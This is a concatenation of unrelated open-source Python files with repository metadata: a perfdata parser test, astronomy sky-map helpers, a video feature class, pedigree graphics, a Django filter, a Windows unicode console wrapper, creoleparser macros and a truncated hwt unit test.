self.assert_(m.max == 100)
s = 'ramused=1009MB;;;0;1982 swapused=540MB;;;; memused=90%'
p = PerfDatas(s)
p.metrics
m = p['swapused']
self.assert_(m.name == 'swapused')
self.assert_(m.value == 540)
self.assert_(m.uom == 'MB')
self.assert_(m.warning == None)
self.assert_(m.critical == None)
self.assert_(m.min == None)
self.assert_(m.max == None)
m = p['memused']
self.assert_(m.name == 'memused')
self.assert_(m.value == 90)
self.assert_(m.uom == '%')
self.assert_(m.warning == None)
self.assert_(m.critical == None)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
self.assert_(len(p) == 3)
s = "'Physical Memory Used'=12085620736Bytes; 'Physical Memory Utilisation'=94%;80;90;"
p = PerfDatas(s)
p.metrics
m = p['Physical Memory Used']
self.assert_(m.name == 'Physical Memory Used')
self.assert_(m.value == 12085620736)
self.assert_(m.uom == 'Bytes')
self.assert_(m.warning is None)
self.assert_(m.critical is None)
self.assert_(m.min is None)
self.assert_(m.max is None)
m = p['Physical Memory Utilisation']
self.assert_(m.name == 'Physical Memory Utilisation')
self.assert_(m.value == 94)
self.assert_(m.uom == '%')
self.assert_(m.warning == 80)
self.assert_(m.critical == 90)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
s = "'C: Space'=35.07GB; 'C: Utilisation'=87.7%;90;95;"
p = PerfDatas(s)
p.metrics
m = p['C: Space']
self.assert_(m.name == 'C: Space')
self.assert_(m.value == 35.07)
self.assert_(m.uom == 'GB')
self.assert_(m.warning is None)
self.assert_(m.critical is None)
self.assert_(m.min is None)
self.assert_(m.max is None)
m = p['C: Utilisation']
self.assert_(m.name == 'C: Utilisation')
self.assert_(m.value == 87.7)
self.assert_(m.uom == '%')
self.assert_(m.warning == 90)
self.assert_(m.critical == 95)
self.assert_(m.min == 0)
self.assert_(m.max == 100)
if __name__ == '__main__':
unittest.main()
|
xorpaul/shinken
|
test/test_parse_perfdata.py
|
Python
|
agpl-3.0
| 4,222 | 0.002842 |
#===========================================================================
# Copyright (c) 2011-2012, the PyFACT developers
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the PyFACT developers nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE PYFACT DEVELOPERS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===========================================================================
# Imports
import sys, time, logging, os, datetime, math
import numpy as np
import scipy.optimize
import scipy.special
import scipy.ndimage
import pyfits
import pyfact as pf
#===========================================================================
# Functions & classes
#---------------------------------------------------------------------------
class SkyCoord:
"""Sky coordinate in RA and Dec. All units should be degree."""
def __init__(self, ra, dec) :
"""
Sky coordinate in RA and Dec. All units should be degree.
In the current implementation it should also work with arrays, though one has to be careful in dist.
Parameters
----------
ra : float/array
Right ascension of the coordinate.
dec : float/array
Declination of the coordinate.
"""
self.ra, self.dec = ra, dec
def dist(self, c) :
"""
Return the distance of the coordinates in degree following the haversine formula,
see e.g. http://en.wikipedia.org/wiki/Great-circle_distance.
Parameters
----------
c : SkyCoord
Returns
-------
distance : float
Return the distance of the coordinates in degree following the haversine formula.
Notes
-----
http://en.wikipedia.org/wiki/Great-circle_distance
"""
return 2. * np.arcsin(np.sqrt(np.sin((self.dec - c.dec) / 360. * np.pi) ** 2.
+ np.cos(self.dec / 180. * np.pi) * np.cos(c.dec / 180. * np.pi)\
* np.sin((self.ra - c.ra) / 360. * np.pi) ** 2.)) / np.pi * 180.
#---------------------------------------------------------------------------
class SkyCircle:
"""A circle on the sky."""
def __init__(self, c, r) :
"""
A circle on the sky.
Parameters
----------
coord : SkyCoord
Coordinates of the circle center (RA, Dec)
r : float
Radius of the circle (deg).
"""
self.c, self.r = c, r
def contains(self, c) :
"""
Checks if the coordinate lies inside the circle.
Parameters
----------
c : SkyCoord
Returns
-------
contains : bool
True if c lies in the SkyCircle.
"""
return self.c.dist(c) <= self.r
def intersects(self, sc) :
"""
Checks if two sky circles overlap.
Parameters
----------
sc : SkyCircle
"""
return self.c.dist(sc.c) <= self.r + sc.r
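# Example: two nearby coordinates and a containment test (values approximate).
# c1, c2 = SkyCoord(83.6, 22.0), SkyCoord(83.8, 22.1)
# c1.dist(c2) is roughly 0.21 deg, so SkyCircle(c1, 0.3).contains(c2) is True.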
#---------------------------------------------------------------------------
def skycircle_from_str(cstr) :
"""Creates SkyCircle from circle region string."""
x, y, r = eval(cstr.upper().replace('CIRCLE', ''))
return SkyCircle(SkyCoord(x, y), r)
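# Example region string accepted above (a sketch; note that eval() trusts the
# input, so only pass well-formed region strings from trusted sources):
#   skycircle_from_str('CIRCLE(83.63, 22.01, 0.3)')  # 0.3 deg circle on the Crab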
#---------------------------------------------------------------------------
def get_cam_acc(camdist, rmax=4., nbins=None, exreg=None, fit=False, fitfunc=None, p0=None) :
"""
Calculates the camera acceptance histogram from a given list with camera distances (event list).
Parameters
----------
camdist : array
Numpy array of camera distances (event list).
rmax : float, optional
Maximum radius for the acceptance histogram.
nbins : int, optional
        Number of bins for the acceptance histogram (default: bins of 0.1 deg width, i.e. nbins = rmax / 0.1).
exreg : array, optional
        Array of exclusion regions. Each exclusion region is given by an array of size 2,
        [r, d], with r = radius and d = distance to the camera center.
fit : bool, optional
Fit acceptance histogram (default=False).
"""
if not nbins :
nbins = int(rmax / .1)
# Create camera distance histogram
n, bins = np.histogram(camdist, bins=nbins, range=[0., rmax])
nerr = np.sqrt(n)
# Bin center array
r = (bins[1:] + bins[:-1]) / 2.
# Bin area (ring) array
r_a = (bins[1:] ** 2. - bins[:-1] ** 2.) * np.pi
# Deal with exclusion regions
    ex_a = np.zeros(len(r))  # excluded area fraction per ring; stays 0. if no exclusion regions are given
    if exreg :
        t = np.ones(len(r))
for reg in exreg :
ex_a += (pf.circle_circle_intersection_a(bins[1:], t * reg[0], t * reg[1])
- pf.circle_circle_intersection_a(bins[:-1], t * reg[0], t * reg[1]))
ex_a /= r_a
# Fit the data
fitter = None
if fit :
#fitfunc = lambda p, x: p[0] * x ** p[1] * (1. + (x / p[2]) ** p[3]) ** ((p[1] + p[4]) / p[3])
if not fitfunc :
fitfunc = lambda p, x: p[0] * x ** 0. * (1. + (x / p[1]) ** p[2]) ** ((0. + p[3]) / p[2])
#fitfunc = lambda p, x: p[0] * x ** 0. * (1. + (x / p[1]) ** p[2]) ** ((0. + p[3]) / p[2]) + p[4] / (np.exp(p[5] * (x - p[6])) + 1.)
if not p0 :
p0 = [n[0] / r_a[0], 1.5, 3., -5.] # Initial guess for the parameters
#p0 = [.5 * n[0] / r_a[0], 1.5, 3., -5., .5 * n[0] / r_a[0], 100., .5] # Initial guess for the parameters
fitter = pf.ChisquareFitter(fitfunc)
m = (n > 0.) * (nerr > 0.) * (r_a != 0.) * ((1. - ex_a) != 0.)
if np.sum(m) <= len(p0) :
            logging.error('Could not fit camera acceptance (npar={0}, valid bins={1})'.format(len(p0), np.sum(m)))
else :
# ok, this _should_ be improved !!!
x, y, yerr = r[m], n[m] / r_a[m] / (1. - ex_a[m]) , nerr[m] / r_a[m] / (1. - ex_a[m])
m = np.isfinite(x) * np.isfinite(y) * np.isfinite(yerr) * (yerr != 0.)
if np.sum(m) <= len(p0) :
                logging.error('Could not fit camera acceptance (npar={0}, valid bins={1})'.format(len(p0), np.sum(m)))
else :
fitter.fit_data(p0, x[m], y[m], yerr[m])
return (n, bins, nerr, r, r_a, ex_a, fitter)
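# Hypothetical call sketch for get_cam_acc (values are illustrative): acceptance
# out to 3 deg with one exclusion region of radius .3 deg at .5 deg distance
# from the camera center, using the default fit function and start parameters:
#   n, bins, nerr, r, r_a, ex_a, fitter = get_cam_acc(camdist, rmax=3., fit=True, exreg=[[.3, .5]])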
#---------------------------------------------------------------------------
def get_sky_mask_circle(r, bin_size) :
"""
    Returns a 2d numpy histogram with (2. * r / bin_size) bins per axis,
    where bins inside a circle of radius r are filled with 1., all other bins are 0.
Parameters
----------
r : float
Radius of the circle.
bin_size : float
        Physical size of the bin, same units as r.
Returns
-------
sky_mask : 2d numpy array
        Returns a 2d numpy histogram with (2. * r / bin_size) bins per axis,
        where bins inside a circle of radius r are filled with 1., all other bins are 0.
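    Examples
    --------
    Sanity-check sketch (added; numpy is imported above): with r equal to
    bin_size, every bin of the resulting 2x2 grid lies inside the circle.
    >>> get_sky_mask_circle(1., 1.).tolist()
    [[1.0, 1.0], [1.0, 1.0]]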
"""
nbins = int(np.ceil(2. * r / bin_size))
sky_x = np.ones((nbins, nbins)) * np.linspace(bin_size / 2., 2. * r - bin_size / 2., nbins)
sky_y = np.transpose(sky_x)
sky_mask = np.where(np.sqrt((sky_x - r) ** 2. + (sky_y - r) ** 2.) < r, 1., 0.)
return sky_mask
#---------------------------------------------------------------------------
def get_sky_mask_ring(rmin, rmax, bin_size) :
"""
Returns a 2d numpy histogram with (2. * rmax / bin_size) bins per axis
filled with a ring with inner radius rmin and outer radius rmax of 1.,
all other bins are 0..
Parameters
----------
rmin : float
Inner radius of the ring.
rmax : float
Outer radius of the ring.
bin_size : float
Physical size of the bin, same units as rmin, rmax.
Returns
-------
sky_mask : 2d numpy array
Returns a 2d numpy histogram with (2. * rmax / bin_size) bins per axis
filled with a ring with inner radius rmin and outer radius rmax of 1.,
all other bins are 0..
"""
nbins = int(np.ceil(2. * rmax / bin_size))
sky_x = np.ones((nbins, nbins)) * np.linspace(bin_size / 2., 2. * rmax - bin_size / 2., nbins)
sky_y = np.transpose(sky_x)
sky_mask = np.where((np.sqrt((sky_x - rmax) ** 2. + (sky_y - rmax) ** 2.) < rmax) * (np.sqrt((sky_x - rmax) ** 2. + (sky_y - rmax) ** 2.) > rmin), 1., 0.)
return sky_mask
#---------------------------------------------------------------------------
def get_exclusion_region_map(map, rarange, decrange, exreg) :
"""
Creates a map (2d numpy histogram) with all bins inside of exclusion regions set to 0. (others 1.).
Dec is on the 1st axis (x), RA is on the 2nd (y).
Parameters
----------
map : 2d array
rarange : array
decrange : array
exreg : array-type of SkyCircle
"""
xnbins, ynbins = map.shape
xstep, ystep = (decrange[1] - decrange[0]) / float(xnbins), (rarange[1] - rarange[0]) / float(ynbins)
sky_mask = np.ones((xnbins, ynbins))
for x, xval in enumerate(np.linspace(decrange[0] + xstep / 2., decrange[1] - xstep / 2., xnbins)) :
for y, yval in enumerate(np.linspace(rarange[0] + ystep / 2., rarange[1] - ystep / 2., ynbins)) :
for reg in exreg :
if reg.contains(SkyCoord(yval, xval)) :
sky_mask[x, y] = 0.
return sky_mask
#---------------------------------------------------------------------------
def oversample_sky_map(sky, mask, exmap=None) :
"""
Oversamples a 2d numpy histogram with a given mask.
Parameters
----------
sky : 2d array
mask : 2d array
exmap : 2d array
"""
sky = np.copy(sky)
sky_nx, sky_ny = sky.shape[0], sky.shape[1]
mask_nx, mask_ny = mask.shape[0], mask.shape[1]
mask_centerx, mask_centery = (mask_nx - 1) / 2, (mask_ny - 1) / 2
# new oversampled sky plot
sky_overs = np.zeros((sky_nx, sky_ny))
# 2d hist keeping the number of bins used (alpha)
sky_alpha = np.ones((sky_nx, sky_ny))
sky_base = np.ones((sky_nx, sky_ny))
    if exmap is not None :
sky *= exmap
sky_base *= exmap
scipy.ndimage.convolve(sky, mask, sky_overs, mode='constant')
scipy.ndimage.convolve(sky_base, mask, sky_alpha, mode='constant')
return (sky_overs, sky_alpha)
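if __name__ == '__main__':
    # Smoke-test sketch added for illustration (needs only the numpy/scipy
    # imports above): oversample a small random map with a circular top-hat mask.
    demo_sky = np.random.rand(50, 50)
    demo_mask = get_sky_mask_circle(.2, .05)
    demo_overs, demo_alpha = oversample_sky_map(demo_sky, demo_mask)
    print(demo_overs.shape)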
#===========================================================================
|
mraue/pyfact
|
pyfact/map.py
|
Python
|
bsd-3-clause
| 11,616 | 0.008351 |
"""
pimpy.video.features.surf : enables computing a video signature
.. module:: surf
:synopsis: Tools for video
:platform: Unix, Mac, Windows
.. moduleauthor:: Sebastien Campion <sebastien.campion@inria.fr>
"""
# pimpy
# Copyright (C) 2010 Sebastien Campion <sebastien.campion@inria.fr>
#
# pimpy is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# pimpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pimpy; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
from feature import Feature
import numpy, logging
from pimpy.video.decoder import decoder
class Surf(Feature):
u"""
A SURFs descriptors provided by OpenCV
:param name: sigsize input signature size default 64
:type name: int
"""
log = logging.getLogger('pimpy.video.features.surf')
description = __doc__
def __init__(self,**kwargs):
u"""
compute video signature based on dct descriptor
"""
Feature.__init__(self,**kwargs)
def _callback(self,frame):
k,d = frame.get_feature("surf")
self.avfs["keypoints"].write(k)
self.avfs["vectors"].write(d)
def get(self,video):
"""
return array of [keypoints,descriptors] for each video frame
:rtype: numpy.array
"""
self.avfs = video.hdf5.get_avfeature_set("visual",self.name)
if not self.avfs :
desc_dataset = (("keypoints",6,numpy.float),
("vectors",64,numpy.float))
self.avfs = video.hdf5.create_avfeature_set("visual",
self.name,
desc_dataset)
d = decoder(video)
d.decode_qcif_gray(self._callback)
print self.avfs.keys()
return (self.avfs['keypoints'].read(),
self.avfs['vectors'].read())
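# Hypothetical usage sketch (assumes a pimpy video object exposing the `hdf5`
# attribute used in get() above; the `name` keyword is an assumption):
#   surf = Surf(name='surf')
#   keypoints, vectors = surf.get(video)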
|
scampion/pimpy
|
pimpy/video/features/surf.py
|
Python
|
agpl-3.0
| 2,428 | 0.011532 |
#!/usr/bin/python
###############################################################################
# NAME: new_graphics3.py
# VERSION: 2.0.0b15 (18SEPTEMBER2006)
# AUTHOR: John B. Cole, PhD (jcole@aipl.arsusda.gov)
# LICENSE: LGPL
###############################################################################
from PyPedal import pyp_demog
from PyPedal import pyp_graphics
from PyPedal import pyp_jbc
from PyPedal import pyp_newclasses
from PyPedal import pyp_nrm
from PyPedal import pyp_metrics
from PyPedal.pyp_utils import pyp_nice_time
if __name__ == '__main__':
print 'Starting pypedal.py at %s' % (pyp_nice_time())
example = pyp_newclasses.loadPedigree(optionsfile='new_graphics3.ini')
if example.kw['messages'] == 'verbose':
print '[INFO]: Calling pyp_graphics.new_draw_pedigree() at %s' % (pyp_nice_time())
pyp_graphics.new_draw_pedigree(example, gfilename='graphics3', gtitle='graphics3 pedigree', gorient='p')
pyp_jbc.color_pedigree(example,gfilename='graphics3', ghatch='0', \
metric='sons', gtitle='Nodes are colored by number of sons.', \
gprog='dot', gname=1)
|
wintermind/pypedal
|
PyPedal/examples/new_graphics3.py
|
Python
|
gpl-2.0
| 1,123 | 0.007124 |
import django_filters
from django_filters import rest_framework as filters
from django_rv_apps.apps.believe_his_prophets.models.spirit_prophecy_chapter import SpiritProphecyChapter, SpiritProphecyChapterLanguage
from django_rv_apps.apps.believe_his_prophets.models.spirit_prophecy import SpiritProphecy
from django_rv_apps.apps.believe_his_prophets.models.language import Language
from django.utils import timezone
class SpiritProphecyChapterLanguageFilter(django_filters.FilterSet):
code_iso = filters.ModelMultipleChoiceFilter(
queryset=Language.objects.all(),
field_name='language__code_iso',
to_field_name='code_iso'
)
start_date = filters.CharFilter(method='filter_date')
class Meta:
model = SpiritProphecyChapterLanguage
fields = ('id' ,'code_iso','start_date')
    def filter_date(self, queryset, name, value):
        # Filters by the server's current local date; the submitted value is
        # only used as a trigger and is otherwise ignored.
        t = timezone.localtime(timezone.now())
return queryset.filter(
spirit_prophecy_chapter__start_date__year = t.year,
spirit_prophecy_chapter__start_date__month = t.month, spirit_prophecy_chapter__start_date__day = t.day,
)
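# Hypothetical query-string usage for the filter set above (field names taken
# from Meta.fields; any start_date value triggers filtering by today's date):
#   ?code_iso=en&start_date=1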
|
davrv93/creed-en-sus-profetas-backend
|
django_rv_apps/apps/believe_his_prophets_api/views/spirit_prophecy_chapter_language/filters.py
|
Python
|
apache-2.0
| 1,155 | 0.013853 |
# -*- coding: utf-8 -*-
"""Stdout, stderr and argv support for unicode."""
##############################################
# Support for unicode in windows cmd.exe
# Posted on Stack Overflow [1], available under CC-BY-SA 3.0 [2]
#
# Question: "Windows cmd encoding change causes Python crash" [3] by Alex [4],
# Answered [5] by David-Sarah Hopwood [6].
#
# [1] https://stackoverflow.com
# [2] https://creativecommons.org/licenses/by-sa/3.0/
# [3] https://stackoverflow.com/questions/878972
# [4] https://stackoverflow.com/users/85185
# [5] https://stackoverflow.com/a/3259271/118671
# [6] https://stackoverflow.com/users/393146
#
################################################
#
# stdin support added by Merlijn van Deen <valhallasw@gmail.com>, March 2012
# Licensed under both CC-BY-SA and the MIT license.
#
################################################
from __future__ import absolute_import, print_function, unicode_literals
from io import UnsupportedOperation
import sys
stdin = sys.stdin
stdout = sys.stdout
stderr = sys.stderr
argv = sys.argv
if sys.version_info[0] > 2:
unicode = str
PY3 = True
else:
PY3 = False
if sys.platform == "win32":
import codecs
from ctypes import WINFUNCTYPE, windll, POINTER
from ctypes import byref, c_int, create_unicode_buffer
from ctypes.wintypes import BOOL, HANDLE, DWORD, LPWSTR, LPCWSTR
try:
from ctypes.wintypes import LPVOID
except ImportError:
from ctypes import c_void_p as LPVOID
original_stderr = sys.stderr
# If any exception occurs in this code, we'll probably try to print it on stderr,
# which makes for frustrating debugging if stderr is directed to our wrapper.
# So be paranoid about catching errors and reporting them to original_stderr,
# so that we can at least see them.
def _complain(message):
print(isinstance(message, str) and message or repr(message), file=original_stderr)
# Work around <http://bugs.python.org/issue6058>.
codecs.register(lambda name: name == 'cp65001' and codecs.lookup('utf-8') or None)
# Make Unicode console output work independently of the current code page.
# This also fixes <http://bugs.python.org/issue1602>.
# Credit to Michael Kaplan <http://blogs.msdn.com/b/michkap/archive/2010/04/07/9989346.aspx>
# and TZOmegaTZIOY
# <https://stackoverflow.com/questions/878972/windows-cmd-encoding-change-causes-python-crash/1432462#1432462>.
try:
# <https://msdn.microsoft.com/en-us/library/ms683231(VS.85).aspx>
# HANDLE WINAPI GetStdHandle(DWORD nStdHandle);
# returns INVALID_HANDLE_VALUE, NULL, or a valid handle
#
# <https://msdn.microsoft.com/en-us/library/aa364960(VS.85).aspx>
# DWORD WINAPI GetFileType(DWORD hFile);
#
# <https://msdn.microsoft.com/en-us/library/ms683167(VS.85).aspx>
# BOOL WINAPI GetConsoleMode(HANDLE hConsole, LPDWORD lpMode);
GetStdHandle = WINFUNCTYPE(HANDLE, DWORD)(("GetStdHandle", windll.kernel32))
STD_INPUT_HANDLE = DWORD(-10)
STD_OUTPUT_HANDLE = DWORD(-11)
STD_ERROR_HANDLE = DWORD(-12)
GetFileType = WINFUNCTYPE(DWORD, DWORD)(("GetFileType", windll.kernel32))
FILE_TYPE_CHAR = 0x0002
FILE_TYPE_REMOTE = 0x8000
GetConsoleMode = (WINFUNCTYPE(BOOL, HANDLE, POINTER(DWORD))
(("GetConsoleMode", windll.kernel32)))
INVALID_HANDLE_VALUE = DWORD(-1).value
def not_a_console(handle):
"""Return whether the handle is not to a console."""
if handle == INVALID_HANDLE_VALUE or handle is None:
return True
return ((GetFileType(handle) & ~FILE_TYPE_REMOTE) != FILE_TYPE_CHAR or
GetConsoleMode(handle, byref(DWORD())) == 0)
def old_fileno(std_name):
"""Return the fileno or None if that doesn't work."""
# some environments like IDLE don't support the fileno operation
# handle those like std streams which don't have fileno at all
std = getattr(sys, 'std{0}'.format(std_name))
if hasattr(std, 'fileno'):
try:
return std.fileno()
except UnsupportedOperation:
pass
old_stdin_fileno = old_fileno('in')
old_stdout_fileno = old_fileno('out')
old_stderr_fileno = old_fileno('err')
STDIN_FILENO = 0
STDOUT_FILENO = 1
STDERR_FILENO = 2
real_stdin = (old_stdin_fileno == STDIN_FILENO)
real_stdout = (old_stdout_fileno == STDOUT_FILENO)
real_stderr = (old_stderr_fileno == STDERR_FILENO)
if real_stdin:
hStdin = GetStdHandle(STD_INPUT_HANDLE)
if not_a_console(hStdin):
real_stdin = False
if real_stdout:
hStdout = GetStdHandle(STD_OUTPUT_HANDLE)
if not_a_console(hStdout):
real_stdout = False
if real_stderr:
hStderr = GetStdHandle(STD_ERROR_HANDLE)
if not_a_console(hStderr):
real_stderr = False
if real_stdin:
ReadConsoleW = WINFUNCTYPE(BOOL, HANDLE, LPVOID, DWORD, POINTER(DWORD),
LPVOID)(("ReadConsoleW", windll.kernel32))
class UnicodeInput:
"""Unicode terminal input class."""
def __init__(self, hConsole, name, bufsize=1024):
"""Initialize the input stream."""
self._hConsole = hConsole
self.bufsize = bufsize
self.buffer = create_unicode_buffer(bufsize)
self.name = name
self.encoding = 'utf-8'
def readline(self):
"""Read one line from the input."""
maxnum = DWORD(self.bufsize - 1)
numrecv = DWORD(0)
result = ReadConsoleW(self._hConsole, self.buffer, maxnum, byref(numrecv), None)
if not result:
raise Exception("stdin failure")
data = self.buffer.value[:numrecv.value]
if not PY3:
return data.encode(self.encoding)
else:
return data
if real_stdout or real_stderr:
# BOOL WINAPI WriteConsoleW(HANDLE hOutput, LPWSTR lpBuffer, DWORD nChars,
# LPDWORD lpCharsWritten, LPVOID lpReserved);
WriteConsoleW = WINFUNCTYPE(BOOL, HANDLE, LPWSTR, DWORD, POINTER(DWORD),
LPVOID)(("WriteConsoleW", windll.kernel32))
class UnicodeOutput:
"""Unicode terminal output class."""
def __init__(self, hConsole, stream, fileno, name):
"""Initialize the output stream."""
self._hConsole = hConsole
self._stream = stream
self._fileno = fileno
self.closed = False
self.softspace = False
self.mode = 'w'
self.encoding = 'utf-8'
self.name = name
self.flush()
def isatty(self):
"""Return whether it's a tty."""
return False
def close(self):
"""Set the stream to be closed."""
# don't really close the handle, that would only cause problems
self.closed = True
def fileno(self):
"""Return the fileno."""
return self._fileno
def flush(self):
"""Flush the stream."""
if self._hConsole is None:
try:
self._stream.flush()
except Exception as e:
_complain("%s.flush: %r from %r"
% (self.name, e, self._stream))
raise
def write(self, text):
"""Write the text to the output."""
try:
if self._hConsole is None:
if isinstance(text, unicode):
text = text.encode('utf-8')
self._stream.write(text)
else:
if not isinstance(text, unicode):
text = bytes(text).decode('utf-8')
remaining = len(text)
while remaining > 0:
n = DWORD(0)
# There is a shorter-than-documented limitation on the
# length of the string passed to WriteConsoleW (see
# <https://tahoe-lafs.org/trac/tahoe-lafs/ticket/1232>.
retval = WriteConsoleW(self._hConsole, text,
min(remaining, 10000),
byref(n), None)
if retval == 0 or n.value == 0:
raise IOError("WriteConsoleW returned %r, n.value = %r"
% (retval, n.value))
remaining -= n.value
if remaining == 0:
break
text = text[n.value:]
except Exception as e:
_complain("%s.write: %r" % (self.name, e))
raise
def writelines(self, lines):
"""Write a list of lines by using write."""
try:
for line in lines:
self.write(line)
except Exception as e:
_complain("%s.writelines: %r" % (self.name, e))
raise
if real_stdin:
stdin = UnicodeInput(hStdin, name='<Unicode console stdin>')
if real_stdout:
stdout = UnicodeOutput(hStdout, sys.stdout, STDOUT_FILENO,
'<Unicode console stdout>')
else:
stdout = UnicodeOutput(None, sys.stdout, old_stdout_fileno,
'<Unicode redirected stdout>')
if real_stderr:
stderr = UnicodeOutput(hStderr, sys.stderr, STDERR_FILENO,
'<Unicode console stderr>')
else:
stderr = UnicodeOutput(None, sys.stderr, old_stderr_fileno,
'<Unicode redirected stderr>')
except Exception as e:
_complain("exception %r while fixing up sys.stdout and sys.stderr" % (e,))
# While we're at it, let's unmangle the command-line arguments:
# This works around <http://bugs.python.org/issue2128>.
GetCommandLineW = WINFUNCTYPE(LPWSTR)(("GetCommandLineW", windll.kernel32))
CommandLineToArgvW = (WINFUNCTYPE(POINTER(LPWSTR), LPCWSTR, POINTER(c_int))
(("CommandLineToArgvW", windll.shell32)))
argc = c_int(0)
argv_unicode = CommandLineToArgvW(GetCommandLineW(), byref(argc))
argv = [argv_unicode[i].encode('utf-8') for i in range(0, argc.value)]
if not hasattr(sys, 'frozen'):
# If this is an executable produced by py2exe or bbfreeze, then it will
# have been invoked directly. Otherwise, unicode_argv[0] is the Python
# interpreter, so skip that.
argv = argv[1:]
# Also skip option arguments to the Python interpreter.
while len(argv) > 0:
arg = argv[0]
if not arg.startswith(b"-") or arg == u"-":
break
argv = argv[1:]
if arg == u'-m':
# sys.argv[0] should really be the absolute path of the module source,
# but never mind
break
if arg == u'-c':
argv[0] = u'-c'
break
if argv == []:
argv = [u'']
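if __name__ == '__main__':
    # Minimal smoke test added as a sketch: write a non-ASCII character
    # through the (possibly wrapped) stdout; a UTF-8-capable console is
    # assumed, otherwise this may raise on narrow terminals.
    stdout.write('unicode console check: \u00e9\n')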
|
icyflame/batman
|
pywikibot/userinterfaces/win32_unicode.py
|
Python
|
mit
| 12,438 | 0.001769 |
"""The macros below aren't reliable (e.g., some fail if ``arg_string`` is `None`)
or safe (``include`` doesn't guard against circular reference). For a more complete example, see
`the code used in the sandbox <http://code.google.com/p/urlminer/source/browse/examples/wiki/macros.py>`_.
"""
import genshi.builder as bldr
import dialects, core
import os
class Page(object):
root = 'test_pages'
def __init__(self,page_name):
self.name = page_name
def get_raw_body(self):
try:
f = open(os.path.join(self.root,self.name + '.txt'),'r')
s = f.read()
f.close()
return s
except IOError:
return None
def exists(self):
try:
f = open(os.path.join(self.root,self.name + '.txt'),'r')
f.close()
return True
except IOError:
return False
def class_func(page_name):
if not Page(page_name).exists():
return 'nonexistent'
def path_func(page_name):
if page_name == 'Home':
return 'FrontPage'
else:
return page_name
## Start of macros
def include(arg_string,body,isblock):
page = Page(arg_string.strip())
return text2html.generate(page.get_raw_body())
def include_raw(arg_string,body,isblock):
page = Page(arg_string.strip())
return bldr.tag.pre(page.get_raw_body(),class_='plain')
def include_source(arg_string,body,isblock):
page = Page(arg_string.strip())
return bldr.tag.pre(text2html.render(page.get_raw_body()))
def source(arg_string,body,isblock):
return bldr.tag.pre(text2html.render(body))
def pre(arg_string,body,isblock):
return bldr.tag.pre(body)
## End of macros
macros = {'include':include,
'include-raw':include_raw,
'include-source':include_source,
'source':source,
'pre':pre
}
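# Wiki-text sketch exercising the macros above (assuming creoleparser's
# <<...>> macro syntax; dispatched by macro_dispatcher below):
#   <<include SomePage>>
#   <<source>>**rendered as escaped creole source**<</source>>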
def macro_dispatcher(macro_name,arg_string,body,isblock,environ):
if macro_name in macros:
return macros[macro_name](arg_string,body,isblock)
dialect = dialects.create_dialect(dialects.creole11_base,
wiki_links_base_url='',
wiki_links_space_char='',
# use_additions=True,
no_wiki_monospace=False,
wiki_links_class_func=class_func,
wiki_links_path_func=path_func,
macro_func=macro_dispatcher)
text2html = core.Parser(dialect)
if __name__ == '__main__':
text = Page('CheatSheetPlus').get_raw_body()
f = open(os.path.join('test_pages','CheatSheetPlus.html'),'r')
rendered = f.read()
f.close()
f = open(os.path.join('test_pages','template.html'),'r')
template = f.read()
f.close()
out = open(os.path.join('test_pages','out.html'),'w')
out.write(template % text2html(text))
out.close()
assert template % text2html(text) == rendered
|
hprid/creoleparser
|
creoleparser/test_cheat_sheet_plus.py
|
Python
|
mit
| 2,923 | 0.021895 |
import unittest
from hwt.code import If, Switch
from hwt.synthesizer.rtlLevel.netlist import RtlNetlist
class AstNodeIoReplacingTC(unittest.TestCase):
def sigs_by_n(self, n):
nl = RtlNetlist()
sigs = [nl.sig(chr(ord("a") + i)) for i in range(n)]
for s in sigs:
s.hidden = False
return nl, sigs
def test_If_simple_replace_input(self):
_, (a, b, c) = self.sigs_by_n(3)
stm = \
If(a,
b(1)
).Else(
b(0)
)
stm._replace_input(a, c)
stm_ref = If(c,
b(1)
).Else(
b(0)
)
self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertEqual(a.endpoints, [])
self.assertEqual(c.endpoints, [stm, stm_ref])
def test_If_elif_replace_input(self):
_, (a, b, c, d) = self.sigs_by_n(4)
stm = \
If(a,
b(1)
).Elif(c & a,
b(0)
).Else(
c(0)
)
stm._replace_input(a, d)
stm_ref = If(d,
b(1)
).Elif(c & d,
b(0)
).Else(
c(0)
)
self.assertTrue(stm.isSame(stm_ref), [stm, stm_ref])
self.assertEqual(a.endpoints, [a._isOn().singleDriver()])
self.assertEqual(c.endpoints, [(c & a).singleDriver(),
(c & d).singleDriver()])
def test_If_nested(self):
_, (a, b, c) = self.sigs_by_n(3)
stm = \
If(a,
If(c,
b(c & a)
).Else(
b(c | a)
)
).Else(
b(0)
)
stm._replace_input(a, c)
stm_ref = \
If(c,
If(c,
